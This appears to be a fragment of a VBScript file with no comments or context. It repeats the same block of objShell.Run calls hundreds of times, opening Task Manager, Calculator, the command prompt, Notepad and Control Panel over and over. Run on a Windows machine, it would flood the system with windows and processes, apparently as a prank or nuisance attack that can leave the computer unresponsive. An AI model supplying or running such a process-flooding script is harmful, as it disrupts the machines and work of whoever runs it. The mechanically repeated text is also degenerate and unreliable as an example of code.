objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
